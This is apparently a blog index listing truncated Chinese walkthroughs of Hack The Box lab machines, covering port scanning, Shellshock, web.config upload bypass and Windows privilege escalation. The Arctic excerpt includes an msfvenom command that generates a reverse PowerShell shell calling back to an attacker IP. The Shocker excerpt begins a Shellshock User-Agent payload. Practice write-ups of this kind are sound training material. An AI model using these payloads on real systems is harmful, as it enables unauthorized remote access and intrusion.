排序
node1 mongodb反弹shell
简介nodeDifficulty Medium 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.58 Linux 1. 信息收集收集受害者服务详情nmap -sC -sV -p- 10.10.10.58 --min-rate 10000 -oA tartar22和30...
Chatterbox AChat System http服务攻击
简介ChatterboxDifficulty Medium 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.74 Windows 1. 信息收集9225和9226都是开启的 且是AChat System http服务 2. 漏洞挖掘与利用访问9255...
Arctic Juicy Potato提权
拿到了反弹shell之后这种可以用Juciy Potato或者PrintSpoofer提权kali上制作木马msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.16.18 LPORT=3333 > systemreverse.batKali监听333...
Shocker cgi-bin目录shellshock
前提有cgi-bin 403错误Bash要小于4.3 漏洞找到.sh的文件gobuster dir -u http://10.10.10.185/cgi-bin/ -w /usr/share/dirb/wordlists/common.txt -x .sh找到是user.shUser-Agent: () { :;};...
Posion ssh端口转发 vnc连接
简介PosionDifficulty Medium 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.84 Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.10.84有22、80端口 访问80端口在listfiles.p...
Sunday 79端口finger服务用户枚举
简介SundayDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.76 Solaris 1. 信息收集收集受害者服务详情nmap -sC -sV -p- 10.10.10.76 --min-rate 10000 -oA Sunday发现一...
Irked irc服务扫描
简介IrkedDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.117 Linux 1. 信息收集收集受害者服务详情nmap -T5 -n -vvv -oA Irked -noscript 10.10.10.117806697/tcp op...
Bounty iis文件上传漏洞web.config绕过
简介SiloDifficulty Easy 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.93 Windows 1. 信息收集可以看到transfer.aspx 和 uploadedfiles 上google搜索iis exploithttps://xz.aliyu...
node2 ltrace使用 利用修改HOME环境变量bypass指定目录
权限提升到root现在我们有了tom的反弹shelltom是admin组的成员 可以运行 前提 看一下当时从网页上下载的文件中的app.js这里有一组命令使用方法且在这里看到想到这就是命令中的backup_key所以尝...
Conceal IKE服务枚举 IPSec服务连接 windows文件上传
简介ConcealDifficulty Medium 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.116 Windows 1. 信息收集扫描发现没有TCP服务尝试扫描UDP服务nmap -p 1-1000 -sU 10.10.10.116先尝试扫描...